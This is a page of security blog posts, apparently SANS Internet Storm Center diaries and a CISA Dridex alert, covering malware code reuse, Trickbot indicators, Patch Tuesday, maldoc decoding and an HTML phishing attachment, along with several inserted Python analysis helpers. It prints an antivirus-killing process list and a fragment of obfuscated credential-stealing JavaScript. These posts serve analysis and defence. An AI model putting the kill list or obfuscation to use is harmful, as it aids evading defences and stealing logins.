Tag Archives: Security

Analyst Webcast: Protecting the User: A Review of Mimecast's Web Security Service – December 12, 2019 1:00pm US/Eastern

This post was originally published on this site

Speakers: David Szili

The web remains a primary vector for cyberattacks, as either the initiation point or the way to complete an adversary’s mission. Unsuspecting employees remain in the firing line despite security awareness training and increasingly intelligent security controls. In this webcast, SANS instructor David Szili will discuss his perspectives on best practices for securing the web in general and his experience using the Mimecast Web Security cloud service in particular.

David will discuss using the Mimecast Web Security service to set policies to identify and block dangerous sites and manage which employees can access which sites as part of an acceptable use program. He will also walk attendees through the built-in reporting capabilities, dashboards, and best practices for setting up and using the service. Attendees will also learn how the web security tools are integrated with the Mimecast Secure Email Gateway with Targeted Threat Protection for simplified setup and the most effective way to manage and block malware and other threats using a single cloud platform.

Register for this webcast and be among the first to receive the associated whitepaper written by SANS instructor David Szili.

Code & Data Reuse in the Malware Ecosystem, (Thu, Dec 12th)

In the past, I have already had the opportunity to give some “security awareness” sessions to developers. One topic that was always debated is the reuse of existing code. Indeed, for a developer, it's tempting not to reinvent the wheel when somebody has already written a piece of code that achieves the expected results. From a time-saving perspective, it's a win for the developers, who can focus on other code. Of course, this can have side effects and introduce bugs, backdoors, etc., but that's not today's topic. Malware developers are also developers and have the same behavior. Code reuse has already been discussed several times[1]. For example, tools exist to detect cloned or reused code in the IDA disassembler[2][3].

A Trendmicro report demonstrated that different malware families (URSNIF, EMOTET, DRIDEX, and BitPaymer) have code similarities[4].

But code or data reuse is present everywhere, even in simple macro languages. Yesterday, I found an interesting sample that contained a function to kill AV and other security products. To achieve this, the best approach is to have a list of potential process names, search for them and try to kill the process:

a2adguard.exe
a2adwizard.exe
a2antidialer.exe
a2cfg.exe
a2cmd.exe
a2free.exe
a2guard.exe
a2hijackfree.exe
a2scan.exe
a2service.exe
a2start.exe
a2sys.exe
a2upd.exe
aavgapi.exe
aawservice.exe
aawtray.exe
ad-aware.exe
ad-watch.exe
[...]

The complete list contained 233 items! On Twitter, one of my followers pointed me to a GitHub page that had a file containing exactly… 233 items! I searched for more references and found other ones which also contained the same list:

  • Reverse Shell Backdoor framework[5]
  • Dr0p1t framework[6]
  • Metasploit[7]

Why should malware developers take time to compile their own list of interesting processes when such lists are already publicly available? If you have written some code or compiled data like this and published it somewhere (for any valid reason, nothing malicious), there is a good chance it will be found and (ab)used by attackers in their code! The best example is Mimikatz, which has been (and is still) used in many attacks. This is valid not only for pieces of code but also for any “data”. Keep this in mind!
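One way to check whether a string list pulled out of a sample was copied from a public one, as an added Python example (not the author's tooling): it normalizes the entries, fingerprints the set and measures the overlap. The two lists are constructed excerpts, not the 233-item list from the sample.

```python
import hashlib

# Constructed excerpts standing in for (a) the process-name list extracted from a
# sample and (b) a list published in a public repository. Formatting differs on
# purpose: mixed case and quoted VBA-style literals on the sample side.
SAMPLE_LIST = """\
a2adguard.exe
A2ADWIZARD.EXE
a2antidialer.exe
"a2cfg.exe"
a2cmd.exe
custom-agent.exe
"""

PUBLIC_LIST = """\
a2adguard.exe
a2adwizard.exe
a2antidialer.exe
a2cfg.exe
a2cmd.exe
a2free.exe
"""


def normalize(raw):
    """Lower-case, strip quotes and whitespace, drop blank lines, so that the
    way a list was embedded (string literals vs. a text file) does not hide
    the fact that it was copied."""
    names = set()
    for line in raw.splitlines():
        name = line.strip().strip('"\'').strip().lower()
        if name:
            names.add(name)
    return names


def fingerprint(names):
    """Order-independent SHA-256 of a normalized list, usable as a lookup key
    against fingerprints of lists already seen in public repositories."""
    return hashlib.sha256("\n".join(sorted(names)).encode()).hexdigest()


def overlap(sample, public):
    """Report how much of the sample's list is explained by the public list."""
    common = sample & public
    return {
        "shared": len(common),
        "sample_only": sorted(sample - public),
        "public_only": sorted(public - sample),
        "jaccard": len(common) / len(sample | public),
        "sample_covered": len(common) / len(sample),
    }
```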

[1] https://www.first.org/resources/papers/london2019/1630-Code-Reuse-Analysis-Holtzman-.pdf
[2] https://github.com/BinSigma/BinClone
[3] https://www.hex-rays.com/products/ida/tech/flirt/in_depth.shtml
[4] https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/
[5] https://github.com/tarcisio-marinho/RSB-Framework/blob/master/Python/victim/av.txt
[6] https://github.com/D4Vinci/Dr0p1t-Framework/blob/master/resources/killav.py
[7] https://github.com/rapid7/metasploit-framework/blob/master/scripts/meterpreter/getcountermeasure.rb

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

German language malspam pushes yet another wave of Trickbot, (Wed, Dec 11th)

Introduction

On Tuesday 2019-12-10, artifacts found through VirusTotal revealed a wave of German language emails pushing Trickbot. Today's diary reviews information from this specific channel of Trickbot distribution.

The malspam

I only found one example of the malicious spam (malspam) in VirusTotal as shown below.


Shown above:  An example of German malspam pushing Trickbot.


Shown above:  An example of the Word documents from this malspam.

Infection traffic

Infection traffic is typical for what I’ve seen with Trickbot for the past several months.


Shown above:  Traffic from the infection filtered in Wireshark.


Shown above:  HTTP traffic to retrieve a Windows executable for Trickbot.


Shown above:  Traffic from later during the infection, filtered in Wireshark.


Shown above:  HTTP traffic caused by Trickbot’s password grabber module.

Forensics on an infected Windows host

See the images below covering artifacts found during forensics on a Windows host infected with this sample of Trickbot.


Shown above:  Artifacts dropped on a Windows host after enabling macros on the Word document.


Shown above:  Trickbot installed on an infected Windows host.


Shown above:  Scheduled task to keep Trickbot persistent on an infected Windows host.

Indicators of Compromise (IoC)

File names for 17 of the Word docs found on VirusTotal:

  • diebewerbung391.doc
  • diebewerbung393.doc
  • diebewerbung423.doc
  • diebewerbung447.doc
  • diebewerbung457.doc
  • diebewerbung467.doc
  • diebewerbung469.doc
  • diebewerbung487.doc
  • Mietvertrag370.doc
  • Mietvertrag404.doc
  • Mietvertrag406.doc
  • Mietvertrag416.doc
  • Mietvertrag424.doc
  • Mietvertrag440.doc
  • Mietvertrag446.doc
  • Mietvertrag454.doc
  • Mietvertrag458.doc

SHA256 hashes for 17 of the Word docs found on VirusTotal:

SHA256 hashes for the downloaded Trickbot executable file:

  • 138f012ce2a236be4d983f1b621efc5a968a6ea37927c49b37fe39e70bc80d29
  • 817c7003b9f1d3b6b576422d5ff04ec9aa662d602b74b26a4fb03e6483d0ab6e

Infection traffic:

  • 162.241.24[.]101 port 80 – www.tinystudiocollective[.]com – GET /meta/21.exe
  • port 80 – ipecho[.]net – GET /plain
  • port 443 – ipecho[.]net – HTTPS traffic
  • 170.238.117[.]187 port 8082 – 170.238.117[.]187 – POST /mango21/[string of characters]
  • 131.161.253[.]190 port 449 – HTTPS/SSL/TLS traffic caused by Trickbot
  • 181.129.104[.]139 port 449 – HTTPS/SSL/TLS traffic caused by Trickbot
  • 185.14.28[.]107 port 447 – HTTPS/SSL/TLS traffic caused by Trickbot
  • 190.214.13[.]2 port 449 – HTTPS/SSL/TLS traffic caused by Trickbot
  • 195.123.245[.]127 port 443 – HTTPS/SSL/TLS traffic caused by Trickbot
  • 23.202.231[.]166 port 448 – Attempted TCP connections, but no response from the server
  • 23.217.138[.]107 port 448 – Attempted TCP connections, but no response from the server

Final words

Trickbot executable files are tagged with a marker that identifies the specific campaign used to distribute them. The tag (usually referred to as “gtag”) is shown in URLs generated by Trickbot's password grabber module, which caused HTTP traffic over TCP port 8082. The gtag for this infection was mango21.
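Detection logic for the traffic pattern described above, as an added Python example that is not part of the diary: it scans constructed HTTP request log lines (my own one-line format, with RFC 5737 documentation addresses rather than the pcap's values) for POST requests to TCP port 8082 whose host is a bare IP address, and reports the first URL path segment as the candidate gtag.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed request log, one request per line: METHOD HOST:PORT URL.
# Addresses are RFC 5737 documentation ranges; the identifiers after the
# gtag are made up.
SAMPLE_REQUESTS = """\
GET 198.51.100.23:80 http://198.51.100.23/meta/21.exe
GET ipecho.net:80 http://ipecho.net/plain
POST 203.0.113.187:8082 http://203.0.113.187:8082/mango21/ABCDEF0123456789/
POST 203.0.113.187:8082 http://203.0.113.187:8082/mango21/ABCDEF0123456789/
POST 203.0.113.187:8082 http://203.0.113.187:8082/mango21/FEDCBA9876543210/
POST www.example.com:8082 http://www.example.com:8082/api/v1/upload
GET 203.0.113.187:8082 http://203.0.113.187:8082/mango21/
"""

LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<host>[^\s:]+):(?P<port>\d+) (?P<url>\S+)$")
IP_LITERAL = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def is_suspect_post(method, host, port, watch_port=8082):
    """The diary's pattern: a POST to TCP 8082 with a bare IP as the host."""
    return method == "POST" and port == watch_port and bool(IP_LITERAL.match(host))


def first_path_segment(url):
    """The gtag sits in the first path segment of the password grabber's URL."""
    segments = [s for s in urlsplit(url).path.split("/") if s]
    return segments[0] if segments else ""


def candidate_gtags(log, watch_port=8082):
    """Count (destination host, candidate gtag) pairs over the request log."""
    hits = Counter()
    for line in log.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        if not is_suspect_post(m["method"], m["host"], int(m["port"]), watch_port):
            continue
        tag = first_path_segment(m["url"])
        if tag:
            hits[(m["host"], tag)] += 1
    return hits
```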

A pcap of the infection traffic, some associated malware, and an example of the malspam can be found here.


Brad Duncan
brad [at] malware-traffic-analysis.net

Microsoft December 2019 Patch Tuesday, (Tue, Dec 10th)

This month we got patches for 36 vulnerabilities total. From those, seven are rated critical and one is already being exploited according to Microsoft. 

The exploited vulnerability (CVE-2019-1458) may allow a local attacker to elevate privileges and run arbitrary code in kernel mode. This vulnerability was reported by Kaspersky Labs and, according to the Zero Day Initiative (ZDI) [1], Kaspersky also reported a UAF vulnerability in the Google Chrome web browser [2] in early November this year. When the Chrome bug became public, there was speculation that it was being used in conjunction with a Windows kernel bug to escape the sandbox. According to ZDI, while it is not confirmed that CVE-2019-1458 is connected to the Chrome attacks, this is the type of bug that could be used to perform a sandbox escape.

Amongst the critical vulnerabilities, it is worth mentioning CVE-2019-1471, a Windows Hyper-V Remote Code Execution Vulnerability. To exploit the vulnerability, an attacker could run a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.

See Renato’s dashboard for a more detailed breakout: https://patchtuesdaydashboard.com

December 2019 Security Updates

Description | CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG)
Git for Visual Studio Remote Code Execution Vulnerability | CVE-2019-1349 | N | N | | | Critical | |
Git for Visual Studio Remote Code Execution Vulnerability | CVE-2019-1350 | N | N | | | Critical | |
Git for Visual Studio Remote Code Execution Vulnerability | CVE-2019-1352 | N | N | | | Critical | |
Git for Visual Studio Remote Code Execution Vulnerability | CVE-2019-1354 | N | N | | | Critical | |
Git for Visual Studio Remote Code Execution Vulnerability | CVE-2019-1387 | N | N | | | Critical | |
Git for Visual Studio Tampering Vulnerability | CVE-2019-1351 | N | N | | | Moderate | |
Latest Servicing Stack Updates | ADV990001 | N | N | | | Critical | |
Microsoft Access Information Disclosure Vulnerability | CVE-2019-1400 | N | N | | | Important | |
Microsoft Access Information Disclosure Vulnerability | CVE-2019-1463 | N | N | | | Important | |
Microsoft Authentication Library for Android Information Disclosure Vulnerability | CVE-2019-1487 | N | N | | | Important | |
Microsoft Defender Security Feature Bypass Vulnerability | CVE-2019-1488 | N | N | | | Important | 3.3 | 3.0
Microsoft Excel Information Disclosure Vulnerability | CVE-2019-1464 | N | N | | | Important | |
Microsoft Guidance for cleaning up orphaned keys generated on vulnerable TPMs and used for Windows Hello for Business | ADV190026 | N | N | | | | |
Microsoft PowerPoint Remote Code Execution Vulnerability | CVE-2019-1462 | N | N | | | Important | |
Microsoft SQL Server Reporting Services XSS Vulnerability | CVE-2019-1332 | N | N | | | Important | |
Microsoft Word Denial of Service Vulnerability | CVE-2019-1461 | N | N | Less Likely | Less Likely | Important | |
Remote Desktop Protocol Information Disclosure Vulnerability | CVE-2019-1489 | N | N | | | Important | |
Skype for Business Server Spoofing Vulnerability | CVE-2019-1490 | N | N | | | Important | |
VBScript Remote Code Execution Vulnerability | CVE-2019-1485 | N | N | | | Important | 7.5 | 6.7
Visual Studio Live Share Spoofing Vulnerability | CVE-2019-1486 | N | N | | | Important | |
Win32k Elevation of Privilege Vulnerability | CVE-2019-1458 | N | N | | | Important | 7.8 | 7.2
Win32k Graphics Remote Code Execution Vulnerability | CVE-2019-1468 | N | N | | | Critical | 8.4 | 7.6
Win32k Information Disclosure Vulnerability | CVE-2019-1469 | N | N | | | Important | 5.5 | 5.0
Windows COM Server Elevation of Privilege Vulnerability | CVE-2019-1478 | N | N | | | Important | 7.8 | 7.0
Windows Elevation of Privilege Vulnerability | CVE-2019-1476 | N | N | | | Important | 7.8 | 7.0
Windows Elevation of Privilege Vulnerability | CVE-2019-1483 | N | N | | | Important | 7.8 | 7.0
Windows GDI Information Disclosure Vulnerability | CVE-2019-1465 | N | N | | | Important | 5.5 | 5.0
Windows GDI Information Disclosure Vulnerability | CVE-2019-1466 | N | N | | | Important | 5.5 | 5.0
Windows GDI Information Disclosure Vulnerability | CVE-2019-1467 | N | N | | | Important | 5.5 | 5.0
Windows Hyper-V Information Disclosure Vulnerability | CVE-2019-1470 | N | N | | | Important | 6.0 | 5.4
Windows Hyper-V Remote Code Execution Vulnerability | CVE-2019-1471 | N | N | | | Critical | 8.2 | 7.4
Windows Kernel Information Disclosure Vulnerability | CVE-2019-1472 | N | N | | | Important | 5.5 | 5.0
Windows Kernel Information Disclosure Vulnerability | CVE-2019-1474 | N | N | | | Important | 5.5 | 5.0
Windows Media Player Information Disclosure Vulnerability | CVE-2019-1480 | N | N | | | Important | 5.5 | 5.0
Windows Media Player Information Disclosure Vulnerability | CVE-2019-1481 | N | N | | | Important | 5.5 | 5.0
Windows OLE Remote Code Execution Vulnerability | CVE-2019-1484 | N | N | | | Important | 7.8 | 7.0
Windows Printer Service Elevation of Privilege Vulnerability | CVE-2019-1477 | N | N | | | Important | 7.8 | 7.0
Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability | CVE-2019-1453 | N | N | Less Likely | Less Likely | Important | 7.5 | 6.7

[1] https://www.zerodayinitiative.com/blog/2019/12/10/the-december-2019-security-update-review

[2] https://www.kaspersky.com/blog/google-chrome-zeroday-wizardopium/29126/


Renato Marinho
Morphus Labs| LinkedIn|Twitter

(Lazy) Sunday Maldoc Analysis, (Mon, Dec 9th)

I received another malicious Word document: with VBA macros and string obfuscation, launching a PowerShell downloader. As classic as they come.

The VBA code is not too long, and the obfuscation is not that hard. It makes a good example for static analysis.

I start the analysis with my tool oledump.py, which gives me an overview of the streams (including VBA macro streams) contained in the document:


Stream 8 has an M indicator: this stream contains VBA macros. Using option -s 8 to select stream 8, and option --vbadecompressskipattributes to decompress the VBA macros without showing the hidden attributes (usually I just use option -v, since I don't mind seeing the hidden attributes), I get to see the VBA code:


There’s a Document_Open subroutine: this will be executed once the document is opened and the user has accepted the warning(s). It assigns a different number to three variables, and then calls function besb repeatedly with a number as argument.

These numbers are mostly different. Function besb takes the argument (a number), divides it by 23 and multiplies it with 1. Then it converts the obtained number to a character (chr function), and concatenates it into variable ahiv.
Finally, subroutine Document_Open executes (run) string ahiv.

With this information, I know that the numbers represent a command and that I can obtain that command by dividing each number by 23 and then converting it to a character. Typically, one would write a small custom script to do this, but as I often have to do such conversions, I made my own tool to help with this: numbers-to-string.py.

Numbers-to-string.py takes text as input, extracts the numbers it finds on each line (provided there are at least 3 numbers per line), transforms the numbers according to a given formula, and then converts them to a string.

I will use this to decode the command. First I select all VBA source code lines with function besb using grep. Since identifiers in VBA are not case-sensitive, I use option -i, just in case the malware author was not consistent in his case use for function name besb.


Next, I use numbers-to-string.py to process each number. Since by default, my tool expects 3 numbers per line, and here I have only one number per line, I use option -n 1 to have my tool process each line with 1 number or more.
Each number has to be divided by 23: I use expression “n / 23” to achieve this. Here is the complete command:


When I read the characters from top to bottom, I see a command forming: powershell iex …

My final step is to use option -j to join all lines together:
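The decoding walked through above, as an added Python example (it is not Didier's numbers-to-string.py): it keeps the VBA lines that call besb regardless of case (grep -i), extracts the numbers with a configurable minimum per line (the tool's default of 3 versus -n 1), applies n / 23 and turns each result into a character. The VBA lines are constructed so that the numbers decode to the first word of the command the diary shows; they are not from the sample.

```python
import re

# Constructed VBA in the shape the diary describes: Document_Open concatenates
# the results of besb(<number>) calls into ahiv and runs the string. The numbers
# are my own, chosen so that n / 23 yields printable ASCII.
SAMPLE_VBA = """\
Private Sub Document_Open()
    Dim ahiv As String
    ahiv = ahiv & Besb(2576)
    ahiv = ahiv & besb(2553)
    ahiv = ahiv & besb(2737)
    ahiv = ahiv & besb(2323)
    ahiv = ahiv & besb(2622)
    ahiv = ahiv & besb(2645)
    ahiv = ahiv & BESB(2392)
    ahiv = ahiv & besb(2323)
    ahiv = ahiv & besb(2484)
    ahiv = ahiv & besb(2484)
    Run ahiv
End Sub
"""


def select_lines(vba, identifier):
    """Keep only the lines mentioning `identifier`, case-insensitively, since
    VBA identifiers are not case-sensitive (the grep -i step)."""
    pat = re.compile(re.escape(identifier), re.IGNORECASE)
    return [line for line in vba.splitlines() if pat.search(line)]


def numbers_to_string(lines, formula=lambda n: n / 23, min_numbers=3):
    """Extract the integers on each line, skip lines carrying fewer than
    min_numbers of them (3 by default, as in the tool; -n 1 lowers it), apply
    the formula and convert each result to a character (VBA's chr)."""
    chars = []
    for line in lines:
        numbers = [int(x) for x in re.findall(r"\d+", line)]
        if len(numbers) < min_numbers:
            continue
        for n in numbers:
            value = formula(n)
            if value != int(value) or not 0 <= value < 0x110000:
                raise ValueError(f"{n} does not map to a code point under the formula")
            chars.append(chr(int(value)))
    return "".join(chars)


def decode_besb(vba, divisor=23):
    """The diary's pipeline: grep -i besb, then numbers-to-string.py with -n 1,
    expression "n / 23" and -j to join the characters into one string."""
    return numbers_to_string(select_lines(vba, "besb"), lambda n: n / divisor, min_numbers=1)
```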

Like I said: a classic example.

Yet, there is something unusual about this document. To be continued …

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

Wireshark 3.0.7 Released, (Sun, Dec 8th)

Wireshark version 3.0.7 was released.

It has a vulnerability fix and bug fixes.

The vulnerability in the CMS dissector can be abused to cause a crash: CVE-2019-19553

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

Integrating Pi-hole Logs in ELK with Logstash, (Sat, Dec 7th)

I have wanted to parse and ingest my Pi-hole DNS logs into Elasticsearch for a while now, to be able to analyze them in various ways. I wrote four separate Grok parsers for Logstash to send the logs to an ELK stack. I am now able to view and analyze which domains have been sinkholed by gravity.list or regex.list (custom wildcard lists) and create the necessary dashboards to report on the DNS traffic. This is an example of the output in Discover. In this example, I have filtered out the dns_type: forwarded.


The configuration file can be downloaded here.
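A Python parser for the four kinds of pihole.log lines (query, forwarded, reply/cached, and blocked by gravity.list or regex.list), added here as a stand-in for the four Grok parsers; it is not the published Logstash configuration. The log lines are constructed in the dnsmasq format Pi-hole writes (my assumption about the format), and the dns_type field mirrors the one the diary filters on.

```python
import re

# Constructed sample of /var/log/pihole.log lines (dnsmasq format as written by
# Pi-hole, to the best of my knowledge); hosts and addresses are made up.
SAMPLE_LOG = """\
Dec  7 10:15:01 dnsmasq[812]: query[A] www.example.com from 192.168.1.20
Dec  7 10:15:01 dnsmasq[812]: forwarded www.example.com to 9.9.9.9
Dec  7 10:15:01 dnsmasq[812]: reply www.example.com is 93.184.216.34
Dec  7 10:15:02 dnsmasq[812]: query[AAAA] ads.example.net from 192.168.1.20
Dec  7 10:15:02 dnsmasq[812]: /etc/pihole/gravity.list ads.example.net is 0.0.0.0
Dec  7 10:15:03 dnsmasq[812]: query[A] tracker.example.org from 192.168.1.31
Dec  7 10:15:03 dnsmasq[812]: /etc/pihole/regex.list tracker.example.org is 0.0.0.0
Dec  7 10:15:04 dnsmasq[812]: cached www.example.com is 93.184.216.34
"""

PREFIX = r"^(?P<timestamp>\w{3}\s+\d+ \d\d:\d\d:\d\d) dnsmasq\[(?P<pid>\d+)\]: "

# One pattern per event kind, in the role of the four Grok parsers. These
# regexes are my own, not the ones in the downloadable pihole.conf.
PATTERNS = [
    ("query", re.compile(
        PREFIX + r"query\[(?P<query_type>\w+)\] (?P<domain>\S+) from (?P<client>\S+)$")),
    ("forwarded", re.compile(
        PREFIX + r"forwarded (?P<domain>\S+) to (?P<upstream>\S+)$")),
    ("reply", re.compile(
        PREFIX + r"(?:reply|cached) (?P<domain>\S+) is (?P<answer>\S+)$")),
    ("blocked", re.compile(
        PREFIX + r"/etc/pihole/(?P<blocklist>gravity\.list|regex\.list) "
                 r"(?P<domain>\S+) is (?P<answer>\S+)$")),
]


def parse_line(line):
    """Return the event as a dict with a dns_type field, or None if no parser matches."""
    for dns_type, pat in PATTERNS:
        m = pat.match(line)
        if m:
            event = m.groupdict()
            event["dns_type"] = dns_type
            return event
    return None


def parse_log(text):
    return [ev for ev in (parse_line(l) for l in text.splitlines()) if ev]


def sinkholed_domains(events):
    """Domain -> blocklist for every lookup answered from gravity.list or regex.list."""
    return {e["domain"]: e["blocklist"] for e in events if e["dns_type"] == "blocked"}
```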

[1] https://pi-hole.net/
[2] https://handlers.sans.edu/gbruneau/elk/pihole.conf
[3] https://www.elastic.co/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

Phishing with a self-contained credentials-stealing webpage, (Fri, Dec 6th)

Phishing e-mails used to steal credentials usually depend on the user clicking a link that leads to a phishing website that looks like the login page of some valid service. Not all credential stealing has to be done using a remote website, however.

I recently came across an interesting phishing campaign in which the scammers used a rather novel technique. The e-mail looked like a traditional payment notice phishing with a fairly usual text.

Good Day

Please find attached a copy of your payment notification

Kind Regards,
James Watson

The HTML attachment it carried, however, turned out to be anything but usual. When HTML attachments are used in credentials-stealing phishing, the HTML code usually either redirects the browser to a fake login page, or it directly loads the fake login page from a source on the internet[1]. This HTML page turned out to do neither.

When I opened the 930 kB long file in a text editor, the only text visible at first glance was on the first line:

<!-- Internal Server Error -->

After it, there were 4735 empty lines followed by a lot of obfuscated JavaScript along with several legitimate and only Base64-encoded JavaScript libraries (e.g. jQuery, Bootstrap,…). Here is a small sample of the obfuscated JavaScript.

function m600(src5){var xwjc,m7hv=Function,z120,mdid,zf2p="NFj:otBH"z]%*,Zv0k4?XEdR9;1JQeIgK&!_yc{iDx) 3up7}w|WS6nr#~s/$nm(@=LVU2T[fPMhCb^r+-.Y8aOt'lq>AG5<",hcbn=zf2p.length,g6j7={cd:""},ue=new m7hv("ret"+"urn unesc"+"ape")(),djkh=new m7hv("x",ue("%74hi%73.c%64+=x")),pcjj=new m7hv("x","y",ue("%72et%75rn%20x.c%68ar%41t(%79)"));for(xwjc=0;xwjc<src5.length;xwjc++){mdid=pcjj(src5,xwjc);z120=zf2p.indexOf(mdid);if(z120>-1){z120-=(xwjc+1)%hcbn;if(z120<0){z120+=hcbn;}djkh.call(g6j7,pcjj(zf2p,z120));}else{djkh.call(g6j7,mdid);}}new m7hv(ue("%64oc%75me%6Et.w%72it%65(t%68is.%63d)%3Bth%69s.c%64=n%75ll")).call(g6j7);}m600("NbqL5wNGTxCxMzZ>pHxvXYJ.n-=PX;I%9NQgy? nCc)=Y$lOT?f+?~X/}OtdWFrA!P}#zOtgCdDFr{r+-.H,,Lq7Zd5d i)st>)1}mY1aQtI{/?Mrz~9.;*tYIXfXsrt[@ZJD(na-L!}qw_GlM/c>?C8F$8aOt''k"'s}fNl'R?oS-3TYzKMg-pIb.?KNOjn:~4?XEdR&NiW:5:"n}

Since the JavaScript was over 600k characters long (not counting the legitimate libraries), manual de-obfuscation and analysis of the code was not a realistic option. The next step, therefore, was to take a look at the website in a browser. After opening the file in Chrome in a VM, it became obvious why the script was so large. Unlike most other HTML-based phishing attachments, this one didn’t depend on an external fake login page, but carried the entire thing inside its body.
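An added analyst-side Python helper, not from the diary: it decodes the percent-encoded fragments quoted above with the same unescape logic the script relies on, and reimplements the position-dependent substitution that m600 applies to its payload before document.write(). The alphabet and payload used for the round-trip check are constructed, because the sample's zf2p string is garbled in the excerpt.

```python
import string
from urllib.parse import unquote

# Percent-encoded fragments quoted from the sample above. unescape() resolves
# them at runtime, so the identifiers never appear in clear text in the file.
ENCODED_FRAGMENTS = [
    "%74hi%73.c%64+=x",
    "%72et%75rn%20x.c%68ar%41t(%79)",
    "%64oc%75me%6Et.w%72it%65(t%68is.%63d)%3Bth%69s.c%64=n%75ll",
]


def reveal_fragments(fragments):
    """Decode the %XX escapes the way JavaScript's unescape() does."""
    return [unquote(f) for f in fragments]


def m600_decode(src, alphabet):
    """Reimplementation of the loop in m600: the character at position i is
    looked up in the alphabet and shifted back by (i + 1) mod len(alphabet)
    places, wrapping around; characters not in the alphabet pass through."""
    n = len(alphabet)
    out = []
    for i, ch in enumerate(src):
        idx = alphabet.find(ch)
        if idx > -1:
            out.append(alphabet[(idx - (i + 1) % n) % n])
        else:
            out.append(ch)
    return "".join(out)


def m600_encode(plain, alphabet):
    """Inverse transform, used here only to build a known-answer test payload."""
    n = len(alphabet)
    out = []
    for i, ch in enumerate(plain):
        idx = alphabet.find(ch)
        out.append(alphabet[(idx + (i + 1) % n) % n] if idx > -1 else ch)
    return "".join(out)


# Constructed alphabet without repeated characters (a repeated character would
# make indexOf ambiguous); the sample's own zf2p string is not recoverable here.
DEMO_ALPHABET = string.ascii_letters + string.digits + " .();="
```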

Although the page was supposed to look like a Microsoft site, the scammers provided a list of multiple valid e-mail providers one could use to “log in”.

After a user supplies an e-mail and a password, the page appears to contact the relevant e-mail server.

In reality, however, it sends an HTTP GET request containing the credentials specified by the user to a remote web server at hxxp://7l748.l748393.96.lt/.

Afterwards, an additional request for a phone number and a recovery e-mail is displayed to the user. When that is filled in as well (and sent to the same domain as before, although this time using an HTTP POST), the browser is redirected to a low-quality picture of the supposed invoice (at least I assume that is what it's supposed to look like) and after a couple of seconds redirected again, this time to either a legitimate Microsoft site or to the domain specified in the recovery e-mail supplied by the user.

Sending a user's credentials to a server and then redirecting their browser to a legitimate site is fairly common behavior for a phishing page. To add insult to injury, in this case the phishing page not only steals the credentials but also transmits them over the network in plain HTTP, without any encryption.

Besides that, the only unusual part of this phishing remains the fact that the entire phishing page is delivered as an attachment. My suspicion is that this was intended to bypass security filters and analytics on web proxies (or provided by SafeLinks), but whatever the reason was, the idea is quite intriguing.

Although this isn't the first phishing campaign with a similar “self-contained” website, this was the first time I came across such a complex HTML phishing attachment, i.e. one that carried all the libraries and files in one package and didn't depend on a remote server for anything other than collecting the stolen credentials.

 

Invoice.html    
MD5 – 754860e44426eb50ff73597650d4d4b3
SHA1 – abb8536392fc6a721ae6f5ba7f377eaca3b4ae96    8bf20f30

———–
Jan Kopriva
@jk0pr
Alef Nula

AA19-339A: Dridex Malware

Original release date: December 5, 2019

Summary

This Alert is the result of recent collaboration between Department of the Treasury Financial Sector Cyber Information Group (CIG) and the Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN) to identify and share information with the financial services sector. Treasury and the Cybersecurity and Infrastructure Security Agency (CISA) are providing this report to inform the sector about the Dridex malware and variants. The report provides an overview of the malware, related activity, and a list of previously unreported indicators of compromise derived from information reported to FinCEN by private sector financial institutions. Because actors using Dridex malware and its derivatives continue to target the financial services sector, including financial institutions and customers, the techniques, tactics, and procedures contained in this report warrant renewed attention. Treasury and CISA encourage network security specialists to incorporate these indicators into existing Dridex-related network defense capabilities and planning.

This Alert does not introduce a new regulatory interpretation, nor impose any new requirements on regulated entities. Except where noted, there is no indication that the actual owner of the email address was involved in the suspicious or malicious activity. If activity related to these indicators of compromise is detected, please notify appropriate law enforcement and the CIG.

For a downloadable copy of IOCs, see:

Technical Details

The Dridex malware, and its various iterations, has the capability to impact confidentiality of customer data and availability of data and systems for business processes. According to industry reporting, the original version of Dridex first appeared in 2012, and by 2015 had become one of the most prevalent financial Trojans. We expect actors using Dridex malware and its derivatives to continue targeting the financial services sector, including both financial institutions and customers.

Dridex-related Phishing Attributes

Actors typically distribute Dridex malware through phishing e-mail spam campaigns. Phishing messages employ a combination of legitimate business names and domains, professional terminology, and language implying urgency to persuade victims to activate open attachments. Sender e-mail addresses can simulate individuals (name@domain.com), administrative (admin@domain.com, support@domain.com), or common “do not reply” local parts (noreply@domain.com). Subject and attachment titles can include typical terms such as “invoice”, “order”, “scan”, “receipt”, “debit note”, “itinerary”, and others.

The e-mail messages vary widely. The e-mail body may contain no text at all, except to include attachments with names that are strings of numbers, apparently relying on the subject line and victim curiosity to coerce the opening of the malicious file. Where there is a message body, the body may specifically state that the contents of the e-mail underwent virus scanning or simply directs the victim toward the link or attachment. In other cases, the body may include a long, substantive message, providing multiple points of contact and context for the malicious attachment. Attachment and hyperlink names vary from random sets of numbers or imitation automatic filenames from scanners to filenames purporting to reference financial records. Attachments may or may not have direct references using the same file name or strings of numbers in the bodies of the e-mails.

Example Links and Filenames (Note: link information is representative. Italicized statements are automatically generated by the cloud storage provider. # represents a random number.):

  • Link: HTTPS://WWW.GOOGLE[.]COM/URL?Q=HTTPS://WWW.(Cloud Services Provider)[.]COM/S/(Cloud Account Value) /RECENT%20WIRE%20PAYMENT %######.SCR?(Cloud Provided Sequence)
  • Link: HTTPS://WWW.GOOGLE[.]COM/URL?Q=HTTPS://WWW.(Cloud Services Provider) [.]COM/S/ Cloud Account Value/AUTOMATEDCLEARINGHOUSE%20 PAYMENT####.DOC? (Cloud Provided Sequence)

  • Link: Malicious File: ID201NLD0012192016.DOC

